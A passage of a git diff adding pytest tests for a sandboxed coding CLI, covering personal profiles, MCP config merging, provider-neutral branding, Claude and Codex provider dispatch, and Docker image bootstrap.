load_personal_profile behavior.""" + + def test_load_nonexistent_returns_none( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Loading a profile for a workspace with no saved profile returns None.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "personal" + ) + + result = personal_profiles.load_personal_profile(tmp_path / "no-such-workspace") + assert result is None + + def test_load_corrupt_file_returns_none( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Loading a corrupt profile JSON returns None (fail-safe).""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + personal_dir = tmp_path / "personal" + monkeypatch.setattr(personal_profiles, "get_personal_projects_dir", lambda: personal_dir) + + ws = tmp_path / "workspace" + repo_id = personal_profiles.get_repo_id(ws) + profile_path = personal_profiles.get_profile_path(repo_id) + profile_path.parent.mkdir(parents=True, exist_ok=True) + profile_path.write_text("not valid json{{{") + + result = personal_profiles.load_personal_profile(ws) + assert result is None + + def test_load_roundtrip_preserves_data( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """A save followed by load returns the same data.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "personal" + ) + + ws = tmp_path / "workspace" + settings = {"enabledPlugins": {"a@b": True, "c@d": False}} + mcp = {"mcpServers": {"s1": {"type": "sse", "url": "http://localhost"}}} + personal_profiles.save_personal_profile(ws, settings, mcp) + + loaded = personal_profiles.load_personal_profile(ws) + assert loaded is not None + assert loaded.settings == settings + assert loaded.mcp == mcp + + +# ════════════════════���════════════════════════════════════���═════════════════════ +# Profile CRUD — List +# ══════════════════════════════════════��════════════════════════════════════════ + + +class TestListPersonalProfiles: + """Characterize list_personal_profiles behavior.""" + + def test_empty_when_no_profiles_exist( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Returns empty list when the personal projects directory doesn't exist.""" + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "empty" + ) + result = personal_profiles.list_personal_profiles() + assert result == [] + + def test_lists_multiple_saved_profiles( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Returns all saved profiles when multiple exist.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + personal_dir = tmp_path / "personal" + monkeypatch.setattr(personal_profiles, "get_personal_projects_dir", lambda: personal_dir) + + ws1 = tmp_path / "ws1" + ws2 = tmp_path / "ws2" + personal_profiles.save_personal_profile(ws1, {"a": 1}, None) + personal_profiles.save_personal_profile(ws2, {"b": 2}, None) + + profiles = personal_profiles.list_personal_profiles() + assert len(profiles) == 2 + repo_ids = {p.repo_id for p in profiles} + assert personal_profiles.get_repo_id(ws1) in repo_ids + assert personal_profiles.get_repo_id(ws2) in repo_ids + + def test_skips_corrupt_files_in_listing( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Corrupt JSON files in the personal dir are silently skipped.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + personal_dir = tmp_path / "personal" + monkeypatch.setattr(personal_profiles, "get_personal_projects_dir", lambda: personal_dir) + + # Save one valid profile + personal_profiles.save_personal_profile(tmp_path / "ws", {"ok": True}, None) + # Write one corrupt file + corrupt = personal_dir / "corrupt.json" + corrupt.write_text("broken{{{") + + profiles = personal_profiles.list_personal_profiles() + assert len(profiles) == 1 + + +# ═══════════════��══════════════════════════���════════════════════════════���═══════ +# Marketplace-state interaction +# ════════════════════════════════════��════════════════════════════════���═════════ + + +class TestMarketplaceInteraction: + """Characterize merge and marketplace-related behavior.""" + + def test_merge_personal_mcp_overlays_correctly(self) -> None: + """Personal MCP config merges under existing workspace MCP.""" + existing = {"mcpServers": {"s1": {"type": "sse"}}} + personal = {"mcpServers": {"s2": {"type": "stdio"}}} + merged = personal_profiles.merge_personal_mcp(existing, personal) + # deep_merge merges existing into personal copy, so both should be present + assert "s1" in merged["mcpServers"] + assert "s2" in merged["mcpServers"] + + def test_merge_personal_mcp_empty_personal_returns_existing(self) -> None: + """Empty personal MCP config returns existing unchanged.""" + existing = {"mcpServers": {"s1": {"type": "sse"}}} + merged = personal_profiles.merge_personal_mcp(existing, {}) + assert merged == existing + + def test_merge_personal_mcp_empty_existing_returns_personal(self) -> None: + """Empty existing MCP config returns personal.""" + personal = {"mcpServers": {"s2": {"type": "stdio"}}} + merged = personal_profiles.merge_personal_mcp({}, personal) + assert merged == personal + + +# ═══════════════════════════════════════════════��═════════════════════════════��═ +# Edge cases: applied-state tracking +# ═════════════════════════════════════════��═════════════════════════════════════ + + +class TestAppliedState: + """Characterize applied state save/load/drift behavior.""" + + def test_load_applied_state_missing_returns_none(self, tmp_path: Path) -> None: + """No applied state file → None.""" + result = personal_profiles.load_applied_state(tmp_path) + assert result is None + + def test_save_and_load_applied_state(self, tmp_path: Path) -> None: + """Applied state roundtrip preserves profile_id and fingerprints.""" + fingerprints = {"settings.local.json": "abc123", ".mcp.json": "def456"} + personal_profiles.save_applied_state(tmp_path, "my-profile", fingerprints) + state = personal_profiles.load_applied_state(tmp_path) + assert state is not None + assert state.profile_id == "my-profile" + assert state.fingerprints == fingerprints + + def test_drift_false_when_no_state(self, tmp_path: Path) -> None: + """No applied state → no drift (safe default).""" + assert personal_profiles.detect_drift(tmp_path) is False + + def test_workspace_has_overrides_false_on_empty(self, tmp_path: Path) -> None: + """Empty workspace has no overrides.""" + assert personal_profiles.workspace_has_overrides(tmp_path) is False + + def test_workspace_has_overrides_true_with_settings(self, tmp_path: Path) -> None: + """Workspace with settings.local.json is detected as having overrides.""" + _write_json(tmp_path / ".claude" / "settings.local.json", {"a": 1}) + assert personal_profiles.workspace_has_overrides(tmp_path) is True diff --git a/tests/test_plugin_isolation.py b/tests/test_plugin_isolation.py index d3b9001..ab60a0d 100644 --- a/tests/test_plugin_isolation.py +++ b/tests/test_plugin_isolation.py @@ -44,8 +44,8 @@ def test_reset_global_settings_called_in_run_sandbox(self): "scc_cli.docker.launch.write_safety_net_policy_to_host", return_value="/tmp/policy.json", ), - patch("scc_cli.docker.launch.build_command", return_value=["docker", "run"]), - patch("scc_cli.docker.launch.subprocess.run") as mock_subprocess, + patch("scc_cli.docker.sandbox.build_command", return_value=["docker", "run"]), + patch("scc_cli.docker.sandbox.subprocess.run") as mock_subprocess, patch("os.name", "nt"), # Skip credential flow on Windows path ): mock_subprocess.return_value.returncode = 0 diff --git a/tests/test_provider_branding.py b/tests/test_provider_branding.py new file mode 100644 index 0000000..e406559 --- /dev/null +++ b/tests/test_provider_branding.py @@ -0,0 +1,275 @@ +"""Tests for provider display helpers and provider-neutral branding.""" + +from __future__ import annotations + +import re +from pathlib import Path +from unittest.mock import MagicMock, patch + +from rich.console import Console +from rich.panel import Panel + +from scc_cli.core.provider_resolution import get_provider_display_name +from scc_cli.ui.branding import get_brand_tagline, get_version_header + +# ── get_provider_display_name ──────────────────────────────────────────────── + + +class TestGetProviderDisplayName: + def test_claude_returns_claude_code(self) -> None: + assert get_provider_display_name("claude") == "Claude Code" + + def test_codex_returns_codex(self) -> None: + assert get_provider_display_name("codex") == "Codex" + + def test_unknown_provider_returns_title_cased(self) -> None: + assert get_provider_display_name("unknown") == "Unknown" + + def test_multi_word_unknown_provider(self) -> None: + assert get_provider_display_name("my-agent") == "My-Agent" + + +# ── get_version_header ─────────────────────────────────────────────────────── + + +class TestGetVersionHeader: + @patch("scc_cli.ui.branding.supports_unicode", return_value=True) + def test_header_says_sandboxed_coding_cli_unicode(self, _mock: object) -> None: + header = get_version_header("1.7.3") + assert "Sandboxed Coding CLI" in header + assert "Claude" not in header + + @patch("scc_cli.ui.branding.supports_unicode", return_value=False) + def test_header_says_sandboxed_coding_cli_ascii(self, _mock: object) -> None: + header = get_version_header("1.7.3") + assert "Sandboxed Coding CLI" in header + assert "Claude" not in header + + +# ── get_brand_tagline ──────────────────────────────────────────────────────── + + +class TestGetBrandTagline: + def test_default_tagline_is_provider_neutral(self) -> None: + tagline = get_brand_tagline() + assert tagline == "Safe development environment manager" + assert "Claude" not in tagline + + def test_tagline_with_claude_provider(self) -> None: + tagline = get_brand_tagline(provider_id="claude") + assert tagline == "Safe development environment manager for Claude Code" + + def test_tagline_with_codex_provider(self) -> None: + tagline = get_brand_tagline(provider_id="codex") + assert tagline == "Safe development environment manager for Codex" + + def test_tagline_with_unknown_provider(self) -> None: + tagline = get_brand_tagline(provider_id="custom") + assert "Custom" in tagline + + +# ── show_launch_panel ──────────────────────────────────────────────────────── + + +def _capture_panel_title(fn: object, *args: object, **kwargs: object) -> str: + """Call a render function and return the Panel title from the first Panel printed.""" + panels: list[Panel] = [] + + def capturing_layout(*a: object, **kw: object) -> None: + for arg in a: + if isinstance(arg, Panel): + panels.append(arg) + + with patch("scc_cli.commands.launch.render.console") as mock_console: + mock_console.print = MagicMock() + with patch("scc_cli.commands.launch.render.print_with_layout", capturing_layout): + fn(*args, **kwargs) # type: ignore[operator] + + assert panels, "No Panel was printed" + title = panels[0].title + # Rich title is a Text or str; convert to plain string + return str(title) if title else "" + + +class TestShowLaunchPanel: + """show_launch_panel() adapts the panel title to display_name.""" + + def test_default_display_name_is_claude_code(self) -> None: + from scc_cli.commands.launch.render import show_launch_panel + + title = _capture_panel_title( + show_launch_panel, + workspace=Path("/tmp/ws"), + team=None, + session_name=None, + branch=None, + is_resume=False, + ) + assert "Launching Claude Code" in title + + def test_codex_display_name(self) -> None: + from scc_cli.commands.launch.render import show_launch_panel + + title = _capture_panel_title( + show_launch_panel, + workspace=Path("/tmp/ws"), + team=None, + session_name=None, + branch=None, + is_resume=False, + display_name="Codex", + ) + assert "Launching Codex" in title + + def test_custom_display_name(self) -> None: + from scc_cli.commands.launch.render import show_launch_panel + + title = _capture_panel_title( + show_launch_panel, + workspace=Path("/tmp/ws"), + team=None, + session_name=None, + branch=None, + is_resume=False, + display_name="My Agent", + ) + assert "Launching My Agent" in title + + +# ── show_launch_context_panel ──────────────────────────────────────────────── + + +class TestShowLaunchContextPanel: + """show_launch_context_panel() adapts the panel title to display_name.""" + + def _make_ctx(self) -> MagicMock: + ctx = MagicMock() + ctx.workspace_root = Path("/tmp/ws") + ctx.entry_dir = Path("/tmp/ws") + ctx.entry_dir_relative = "." + ctx.mount_root = Path("/tmp/ws") + ctx.container_workdir = "/tmp/ws" + ctx.team = None + ctx.branch = None + ctx.session_name = None + ctx.mode = "new" + return ctx + + def test_default_title_is_claude_code(self) -> None: + from scc_cli.commands.launch.render import show_launch_context_panel + + title = _capture_panel_title(show_launch_context_panel, self._make_ctx()) + assert "Launching Claude Code" in title + + def test_codex_title(self) -> None: + from scc_cli.commands.launch.render import show_launch_context_panel + + title = _capture_panel_title( + show_launch_context_panel, + self._make_ctx(), + display_name="Codex", + ) + assert "Launching Codex" in title + + +# ── render_doctor_results ──────────────────────────────────────────────────── + + +class TestRenderDoctorResults: + """render_doctor_results() adapts the summary line to provider_id.""" + + def _make_ok_result(self) -> MagicMock: + result = MagicMock() + result.all_ok = True + result.checks = [] + result.error_count = 0 + result.warning_count = 0 + return result + + def test_default_summary_says_claude_code(self) -> None: + from scc_cli.doctor.render import render_doctor_results + + buf = Console(file=__import__("io").StringIO(), force_terminal=True) + render_doctor_results(buf, self._make_ok_result()) + output = buf.file.getvalue() # type: ignore[union-attr] + assert "Claude Code" in output + + def test_codex_summary(self) -> None: + from scc_cli.doctor.render import render_doctor_results + + buf = Console(file=__import__("io").StringIO(), force_terminal=True) + render_doctor_results(buf, self._make_ok_result(), provider_id="codex") + output = buf.file.getvalue() # type: ignore[union-attr] + assert "Codex" in output + assert "Claude Code" not in output + + +# ── Guardrail: no "Claude Code" in non-adapter user-facing code ───────────── + +# Directories and file prefixes that are allowed to mention "Claude Code" +# because they are Claude-specific adapters or infrastructure. +_ALLOWED_DIRS = {"adapters", "docker", "marketplace"} +_ALLOWED_PREFIXES = {"claude_"} + +# Files that legitimately contain the string as a lookup value or default +_ALLOWED_FILES = { + "provider_resolution.py", # lookup table mapping "claude" -> "Claude Code" + "provider_registry.py", # registry data: display_name is a factual field, not UI copy + "setup.py", # setup wizard: user-facing provider preference labels +} + +# Pattern for default parameter values like `display_name: str = "Claude Code"` +# These are acceptable because the default is overridden at call sites. +_DEFAULT_PARAM_RE = re.compile(r'display_name:\s*str\s*=\s*"Claude Code"') + + +class TestNoCloudeCodeInNonAdapterModules: + """Guardrail: scan src/scc_cli/ for 'Claude Code' or 'Sandboxed Claude' + outside adapter/infrastructure modules. Any unexpected match fails the test. + """ + + def _collect_violations(self) -> list[str]: + src_root = Path(__file__).resolve().parent.parent / "src" / "scc_cli" + violations: list[str] = [] + + for py_file in sorted(src_root.rglob("*.py")): + rel = py_file.relative_to(src_root) + parts = rel.parts + + # Skip __pycache__ + if "__pycache__" in parts: + continue + + # Skip allowed directories + if parts[0] in _ALLOWED_DIRS: + continue + + # Skip files with allowed prefixes (e.g. claude_renderer.py) + if any(parts[-1].startswith(p) for p in _ALLOWED_PREFIXES): + continue + + # Skip allowed individual files + if parts[-1] in _ALLOWED_FILES: + continue + + try: + content = py_file.read_text(encoding="utf-8") + except OSError: + continue + + for lineno, line in enumerate(content.splitlines(), start=1): + # Skip default parameter values — these are overridden at call sites + if _DEFAULT_PARAM_RE.search(line): + continue + + if "Claude Code" in line or "Sandboxed Claude" in line: + violations.append(f"{rel}:{lineno}: {line.strip()}") + + return violations + + def test_no_claude_code_references(self) -> None: + violations = self._collect_violations() + assert violations == [], ( + "Found 'Claude Code' or 'Sandboxed Claude' in non-adapter modules:\n" + + "\n".join(f" {v}" for v in violations) + ) diff --git a/tests/test_provider_coexistence.py b/tests/test_provider_coexistence.py new file mode 100644 index 0000000..044aceb --- /dev/null +++ b/tests/test_provider_coexistence.py @@ -0,0 +1,147 @@ +"""Coexistence proof: Claude and Codex containers, volumes, sessions, specs don't collide.""" + +from __future__ import annotations + +from pathlib import Path + +from scc_cli.adapters.oci_sandbox_runtime import _container_name +from scc_cli.core.provider_registry import PROVIDER_REGISTRY +from scc_cli.ports.models import MountSpec, SandboxSpec +from scc_cli.ports.session_models import SessionFilter, SessionRecord + + +class TestContainerNameCoexistence: + """Container names for same workspace + different providers must differ.""" + + def test_different_providers_produce_different_names(self) -> None: + ws = Path("/home/user/my-project") + claude_name = _container_name(ws, provider_id="claude") + codex_name = _container_name(ws, provider_id="codex") + assert claude_name != codex_name + + def test_same_provider_same_workspace_is_deterministic(self) -> None: + ws = Path("/home/user/my-project") + assert _container_name(ws, "claude") == _container_name(ws, "claude") + + def test_empty_provider_differs_from_named(self) -> None: + ws = Path("/home/user/my-project") + default_name = _container_name(ws, provider_id="") + claude_name = _container_name(ws, provider_id="claude") + assert default_name != claude_name + + +class TestDataVolumeCoexistence: + """Data volume names must differ per provider.""" + + def test_claude_codex_volumes_differ(self) -> None: + assert PROVIDER_REGISTRY["claude"].data_volume != PROVIDER_REGISTRY["codex"].data_volume + + def test_volumes_are_nonempty(self) -> None: + for pid, spec in PROVIDER_REGISTRY.items(): + assert spec.data_volume, f"volume for {pid} is empty" + + +class TestConfigDirCoexistence: + """Config directory names must differ per provider.""" + + def test_claude_codex_config_dirs_differ(self) -> None: + assert PROVIDER_REGISTRY["claude"].config_dir != PROVIDER_REGISTRY["codex"].config_dir + + +class TestImageRefCoexistence: + """Image references must differ per provider.""" + + def test_claude_codex_images_differ(self) -> None: + assert PROVIDER_REGISTRY["claude"].image_ref != PROVIDER_REGISTRY["codex"].image_ref + + +class TestSessionCoexistence: + """Sessions with different provider_ids can coexist and be filtered.""" + + def test_records_with_different_providers_coexist(self) -> None: + claude_rec = SessionRecord(workspace="/w", provider_id="claude") + codex_rec = SessionRecord(workspace="/w", provider_id="codex") + assert claude_rec.provider_id != codex_rec.provider_id + # Both are valid and serializable + assert claude_rec.to_dict()["provider_id"] == "claude" + assert codex_rec.to_dict()["provider_id"] == "codex" + + def test_session_filter_isolates_by_provider(self) -> None: + records = [ + SessionRecord(workspace="/w", provider_id="claude", last_used="2025-01-01T00:00:00"), + SessionRecord(workspace="/w", provider_id="codex", last_used="2025-01-01T00:00:00"), + SessionRecord(workspace="/w2", provider_id="claude", last_used="2025-01-02T00:00:00"), + ] + filt = SessionFilter(provider_id="claude") + filtered = [r for r in records if r.provider_id == filt.provider_id] + assert len(filtered) == 2 + assert all(r.provider_id == "claude" for r in filtered) + + def test_session_filter_codex_only(self) -> None: + records = [ + SessionRecord(workspace="/w", provider_id="claude"), + SessionRecord(workspace="/w", provider_id="codex"), + ] + filt = SessionFilter(provider_id="codex") + filtered = [r for r in records if r.provider_id == filt.provider_id] + assert len(filtered) == 1 + assert filtered[0].provider_id == "codex" + + def test_no_provider_filter_returns_all(self) -> None: + records = [ + SessionRecord(workspace="/w", provider_id="claude"), + SessionRecord(workspace="/w", provider_id="codex"), + ] + filt = SessionFilter(provider_id=None) + # No provider filter applied + filtered = ( + [r for r in records if r.provider_id == filt.provider_id] + if filt.provider_id is not None + else records + ) + assert len(filtered) == 2 + + +class TestSandboxSpecCoexistence: + """SandboxSpec fields must differ per provider for the same workspace.""" + + @staticmethod + def _make_spec(provider_id: str) -> SandboxSpec: + reg = PROVIDER_REGISTRY[provider_id] + image = reg.image_ref + data_vol = reg.data_volume + config_dir = reg.config_dir + return SandboxSpec( + image=image, + workspace_mount=MountSpec(source=Path("/w"), target=Path("/workspace")), + workdir=Path("/workspace"), + data_volume=data_vol, + config_dir=config_dir, + provider_id=provider_id, + agent_argv=["claude" if provider_id == "claude" else "codex"], + ) + + def test_image_refs_differ(self) -> None: + claude = self._make_spec("claude") + codex = self._make_spec("codex") + assert claude.image != codex.image + + def test_data_volumes_differ(self) -> None: + claude = self._make_spec("claude") + codex = self._make_spec("codex") + assert claude.data_volume != codex.data_volume + + def test_config_dirs_differ(self) -> None: + claude = self._make_spec("claude") + codex = self._make_spec("codex") + assert claude.config_dir != codex.config_dir + + def test_agent_argv_differs(self) -> None: + claude = self._make_spec("claude") + codex = self._make_spec("codex") + assert claude.agent_argv != codex.agent_argv + + def test_provider_id_field_differs(self) -> None: + claude = self._make_spec("claude") + codex = self._make_spec("codex") + assert claude.provider_id != codex.provider_id diff --git a/tests/test_provider_commands.py b/tests/test_provider_commands.py new file mode 100644 index 0000000..577d0a4 --- /dev/null +++ b/tests/test_provider_commands.py @@ -0,0 +1,149 @@ +"""Tests for provider CLI commands (scc provider show/set).""" + +from __future__ import annotations + +from unittest.mock import patch + +from typer.testing import CliRunner + +from scc_cli.cli import app +from scc_cli.core.provider_resolution import KNOWN_PROVIDERS + +runner = CliRunner() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# scc provider show +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderShow: + """Tests for 'scc provider show' command.""" + + def test_show_default_provider(self) -> None: + """When no provider is configured, show prints 'ask'.""" + with patch("scc_cli.commands.provider.config.get_selected_provider", return_value=None): + result = runner.invoke(app, ["provider", "show"]) + assert result.exit_code == 0 + assert "ask" in result.output + + def test_show_configured_provider(self) -> None: + """When a provider is configured, show prints it.""" + with patch("scc_cli.commands.provider.config.get_selected_provider", return_value="codex"): + result = runner.invoke(app, ["provider", "show"]) + assert result.exit_code == 0 + assert "codex" in result.output + + +# ═══════════════════════════════════════════════════════════════════════════════ +# scc provider set +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderSet: + """Tests for 'scc provider set' command.""" + + def test_set_valid_provider(self) -> None: + """Setting a known provider persists it and prints confirmation.""" + with patch("scc_cli.commands.provider.config.set_selected_provider") as mock_set: + result = runner.invoke(app, ["provider", "set", "codex"]) + assert result.exit_code == 0 + mock_set.assert_called_once_with("codex") + assert "codex" in result.output + + def test_set_claude_provider(self) -> None: + """Setting claude is also valid.""" + with patch("scc_cli.commands.provider.config.set_selected_provider") as mock_set: + result = runner.invoke(app, ["provider", "set", "claude"]) + assert result.exit_code == 0 + mock_set.assert_called_once_with("claude") + + def test_set_invalid_provider_errors(self) -> None: + """Setting an unknown provider exits with error.""" + result = runner.invoke(app, ["provider", "set", "invalid"]) + assert result.exit_code != 0 + assert "Unknown provider" in result.output + + def test_set_invalid_provider_lists_known(self) -> None: + """Error message lists known providers.""" + result = runner.invoke(app, ["provider", "set", "foobar"]) + for p in KNOWN_PROVIDERS: + assert p in result.output + assert "ask" in result.output + + def test_set_ask_clears_global_preference(self) -> None: + with patch("scc_cli.commands.provider.config.set_selected_provider") as mock_set: + result = runner.invoke(app, ["provider", "set", "ask"]) + assert result.exit_code == 0 + mock_set.assert_called_once_with("ask") + assert "ask" in result.output + + +# ═══════════════════════════════════════════════════════════════════════════════ +# scc provider (no subcommand) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderNoArgs: + """Tests for 'scc provider' with no subcommand.""" + + def test_no_args_shows_help(self) -> None: + """Running 'scc provider' with no subcommand shows help.""" + result = runner.invoke(app, ["provider"]) + # no_args_is_help=True causes typer to show help and exit 0 or 2 + assert "show" in result.output + assert "set" in result.output + + +# ═══════════════════════════════════════════════════════════════════════════════ +# StartSessionRequest provider_id field +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestStartSessionRequestProviderField: + """Verify StartSessionRequest has provider_id field.""" + + def test_provider_id_defaults_to_none(self) -> None: + """provider_id defaults to None when not specified.""" + from pathlib import Path + + from scc_cli.application.start_session import StartSessionRequest + + req = StartSessionRequest( + workspace_path=Path("/tmp/test"), + workspace_arg=None, + entry_dir=Path("/tmp"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + ) + assert req.provider_id is None + + def test_provider_id_can_be_set(self) -> None: + """provider_id can be explicitly set.""" + from pathlib import Path + + from scc_cli.application.start_session import StartSessionRequest + + req = StartSessionRequest( + workspace_path=Path("/tmp/test"), + workspace_arg=None, + entry_dir=Path("/tmp"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="codex", + ) + assert req.provider_id == "codex" diff --git a/tests/test_provider_dispatch.py b/tests/test_provider_dispatch.py new file mode 100644 index 0000000..4ef2061 --- /dev/null +++ b/tests/test_provider_dispatch.py @@ -0,0 +1,143 @@ +"""Tests for provider dispatch wiring in the launch path.""" + +from __future__ import annotations + +from dataclasses import replace + +import pytest + +from scc_cli.commands.launch.dependencies import build_start_session_dependencies +from scc_cli.core.contracts import RuntimeInfo +from scc_cli.core.errors import ( + InvalidLaunchPlanError, + InvalidProviderError, + ProviderNotAllowedError, +) +from scc_cli.core.provider_resolution import resolve_active_provider +from tests.fakes import build_fake_adapters + + +class TestBuildStartSessionDependenciesDispatch: + """Provider dispatch via build_start_session_dependencies.""" + + def test_empty_provider_id_raises_invalid_provider_error(self) -> None: + """D032: empty provider_id must fail-closed, not default to Claude.""" + adapters = build_fake_adapters() + with pytest.raises(InvalidProviderError): + build_start_session_dependencies(adapters, provider_id="") + + def test_explicit_claude_dispatch(self) -> None: + adapters = build_fake_adapters() + deps = build_start_session_dependencies(adapters, provider_id="claude") + assert deps.agent_provider is adapters.agent_provider + + def test_explicit_codex_dispatch(self) -> None: + adapters = build_fake_adapters() + deps = build_start_session_dependencies(adapters, provider_id="codex") + assert deps.agent_provider is adapters.codex_agent_provider + + def test_unknown_provider_raises_invalid_provider_error(self) -> None: + """Unknown provider_id not in dispatch table raises InvalidProviderError.""" + adapters = build_fake_adapters() + with pytest.raises(InvalidProviderError): + build_start_session_dependencies(adapters, provider_id="unknown") + + def test_codex_dispatch_with_none_codex_provider_raises(self) -> None: + """If codex_agent_provider is None, dispatch raises InvalidLaunchPlanError.""" + from scc_cli.core.errors import InvalidLaunchPlanError + + adapters = replace(build_fake_adapters(), codex_agent_provider=None) + with pytest.raises(InvalidLaunchPlanError, match="missing provider wiring"): + build_start_session_dependencies(adapters, provider_id="codex") + + +class TestAgentRunnerDispatch: + """agent_runner dispatched per-provider from the dispatch table.""" + + def test_claude_dispatch_uses_claude_agent_runner(self) -> None: + adapters = build_fake_adapters() + deps = build_start_session_dependencies(adapters, provider_id="claude") + assert deps.agent_runner is adapters.agent_runner + + def test_codex_dispatch_uses_codex_agent_runner(self) -> None: + adapters = build_fake_adapters() + deps = build_start_session_dependencies(adapters, provider_id="codex") + assert deps.agent_runner is adapters.codex_agent_runner + + def test_unknown_provider_raises_invalid_provider_error_runner(self) -> None: + """Unknown provider_id raises before runner dispatch is reached.""" + adapters = build_fake_adapters() + with pytest.raises(InvalidProviderError): + build_start_session_dependencies(adapters, provider_id="unknown") + + def test_codex_dispatch_with_none_codex_runner_raises(self) -> None: + adapters = replace(build_fake_adapters(), codex_agent_runner=None) + with pytest.raises(InvalidLaunchPlanError, match="missing agent runner wiring"): + build_start_session_dependencies(adapters, provider_id="codex") + + +class TestRuntimeInfoThreading: + """runtime_info threaded from runtime_probe into dependencies.""" + + def test_runtime_info_threaded_from_probe(self) -> None: + """When runtime_probe exists, runtime_info is populated.""" + adapters = build_fake_adapters() + deps = build_start_session_dependencies(adapters, provider_id="claude") + # FakeRuntimeProbe returns a RuntimeInfo — verify it landed + assert deps.runtime_info is not None + assert isinstance(deps.runtime_info, RuntimeInfo) + + def test_runtime_info_none_when_no_probe(self) -> None: + """When runtime_probe is None, runtime_info stays None.""" + adapters = replace(build_fake_adapters(), runtime_probe=None) + deps = build_start_session_dependencies(adapters, provider_id="claude") + assert deps.runtime_info is None + + +class TestProviderPolicyInResolveActiveProvider: + """Policy violation tests via resolve_active_provider (used in flow.py).""" + + def test_allowed_providers_blocks_codex(self) -> None: + with pytest.raises(ProviderNotAllowedError): + resolve_active_provider( + cli_flag="codex", + config_provider=None, + allowed_providers=("claude",), + ) + + def test_allowed_providers_permits_claude(self) -> None: + result = resolve_active_provider( + cli_flag="claude", + config_provider=None, + allowed_providers=("claude",), + ) + assert result == "claude" + + def test_empty_allowed_providers_permits_all(self) -> None: + result = resolve_active_provider( + cli_flag="codex", + config_provider=None, + allowed_providers=(), + ) + assert result == "codex" + + def test_cli_flag_overrides_config(self) -> None: + result = resolve_active_provider( + cli_flag="codex", + config_provider="claude", + ) + assert result == "codex" + + def test_config_provider_used_when_no_cli_flag(self) -> None: + result = resolve_active_provider( + cli_flag=None, + config_provider="codex", + ) + assert result == "codex" + + def test_default_is_claude(self) -> None: + result = resolve_active_provider( + cli_flag=None, + config_provider=None, + ) + assert result == "claude" diff --git a/tests/test_provider_image_bootstrap.py b/tests/test_provider_image_bootstrap.py new file mode 100644 index 0000000..8b92ba2 --- /dev/null +++ b/tests/test_provider_image_bootstrap.py @@ -0,0 +1,89 @@ +"""Tests for automatic provider image preparation in launch flows.""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.commands.launch.provider_image import ( + _build_provider_image, + ensure_provider_image, + get_provider_build_command, +) +from scc_cli.core.errors import ProviderImageBuildError, ProviderImageMissingError + + +def test_get_provider_build_command_uses_registry_image_and_context() -> None: + command = get_provider_build_command("claude") + + assert command[:4] == ["docker", "build", "-t", "scc-agent-claude:latest"] + assert command[-1].endswith("images/scc-agent-claude") + + +@patch("scc_cli.commands.launch.provider_image._provider_image_exists", return_value=True) +@patch("scc_cli.commands.launch.provider_image._build_provider_image") +def test_ensure_provider_image_skips_when_present( + mock_build: MagicMock, + _mock_exists: MagicMock, +) -> None: + show_notice = MagicMock() + + ensure_provider_image( + "claude", + console=MagicMock(), + non_interactive=False, + show_notice=show_notice, + ) + + show_notice.assert_not_called() + mock_build.assert_not_called() + + +@patch("scc_cli.commands.launch.provider_image._provider_image_exists", return_value=False) +@patch("scc_cli.commands.launch.provider_image._build_provider_image") +def test_ensure_provider_image_auto_builds_interactively( + mock_build: MagicMock, + _mock_exists: MagicMock, +) -> None: + show_notice = MagicMock() + + ensure_provider_image( + "claude", + console=MagicMock(), + non_interactive=False, + show_notice=show_notice, + ) + + show_notice.assert_called_once() + mock_build.assert_called_once() + + +@patch("scc_cli.commands.launch.provider_image._provider_image_exists", return_value=False) +def test_ensure_provider_image_fails_closed_non_interactive( + _mock_exists: MagicMock, +) -> None: + with pytest.raises(ProviderImageMissingError) as exc_info: + ensure_provider_image( + "codex", + console=MagicMock(), + non_interactive=True, + show_notice=MagicMock(), + ) + + assert "docker build -t scc-agent-codex:latest" in exc_info.value.suggested_action + + +@patch("scc_cli.commands.launch.provider_image.Status") +@patch("scc_cli.commands.launch.provider_image.subprocess.run") +def test_build_provider_image_raises_typed_error_on_failure( + mock_run: MagicMock, + _mock_status: MagicMock, +) -> None: + mock_run.return_value = MagicMock(returncode=1, stderr="boom") + + with pytest.raises(ProviderImageBuildError) as exc_info: + _build_provider_image("codex", console=MagicMock()) + + assert "codex" in exc_info.value.user_message + assert "docker build -t scc-agent-codex:latest" in exc_info.value.suggested_action diff --git a/tests/test_provider_machine_readable.py b/tests/test_provider_machine_readable.py new file mode 100644 index 0000000..4f2f4ff --- /dev/null +++ b/tests/test_provider_machine_readable.py @@ -0,0 +1,356 @@ +"""Tests for machine-readable provider_id outputs and provider-aware container naming. + +Covers: build_dry_run_data, build_session_list_data, _container_name, +SandboxSpec.provider_id, and support bundle manifest provider_id. +""" + +from __future__ import annotations + +import hashlib +from pathlib import Path +from typing import Any +from unittest.mock import MagicMock, patch + + +class TestBuildDryRunDataProviderId: + """build_dry_run_data includes provider_id in output dict.""" + + def test_with_provider_id(self, tmp_path: Path) -> None: + from scc_cli.commands.launch.render import build_dry_run_data + + result = build_dry_run_data( + workspace_path=tmp_path, + team=None, + 